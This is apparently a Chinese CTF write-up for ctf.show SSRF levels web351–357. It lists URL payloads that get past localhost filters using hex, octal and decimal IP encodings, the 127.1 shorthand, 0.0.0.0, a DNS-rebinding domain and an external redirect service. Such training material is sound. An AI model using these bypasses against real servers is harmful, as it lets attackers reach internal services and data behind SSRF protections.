CTF-SHOW SSRF

web351

存在一个flag.php页面，访问会返回不是本地用户的消息，那肯定是要让我们以本地用户去访问127.0.0.1/flag.php

web352

代码中先判断是否为HTTP或https协议，之后判断我们传入的url中是否含有localhost和127.0.0，如果没有则执行下面语句

意思：过滤掉了localhost和127.0.0

url=http://0x7F.0.0.1/flag.php 16进制
url=http://0177.0.0.1/flag.php 8进制
url=http://0.0.0.0/flag.php
url=http://0/flag.php
url=http://127.127.127.127/flag.php

web353

这题与上一题类似，过滤更严格，但可以使用进制转换

十六进制
url=http://0x7F.0.0.1/flag.php
八进制
url=http://0177.0.0.1/flag.php
10 进制整数格式
url=http://2130706433/flag.php
16 进制整数格式，还是上面那个网站转换记得前缀0x
url=http://0x7F000001/flag.php
还有一种特殊的省略模式
127.0.0.1写成127.1
用CIDR绕过localhost
url=http://127.127.127.127/flag.php
url=http://0/flag.php
url=http://0.0.0.0/flag.php

web354

该题过滤了1和0，使用DNS重绑定绕过

url=http://sudo.cc/flag.php

web355

限制了host长度：小于等于5，使用127.1省略绕过

url=http://127.1/flag.php

web366

此时的host长度限制为小于等于3

0在 linux 系统中会解析成127.0.0.1在windows中解析成0.0.0.0

url=http://0/flag.php

web357

gethostbyname()函数

主要作用：用域名或者主机名获取地址，操作系统提供的库函数。

成功返回的非空指针指向如下的hostent结构：

struct hostent
{
char *h_name; //主机名
char **h_aliases; //主机别名(指向到虚拟主机的域名)
int h_addrtype; //主机IP地址类型
int h_length; //主机IP地址长度，对于IPv4是四字节
char **h_addr_list; //主机IP地址列表
};

#define h_addr h_addr_list[0]

filter_var() 函数

通过指定的过滤器过滤变量。

如果成功，则返回已过滤的数据，如果失败，则返回 false。

所以url不能是私有地址，需要一个公网ip

在网站http://ceye.io/注册账号，会自动分配一个域名:

http://r.xxxxxx/flag.php
xxx为分给你的域名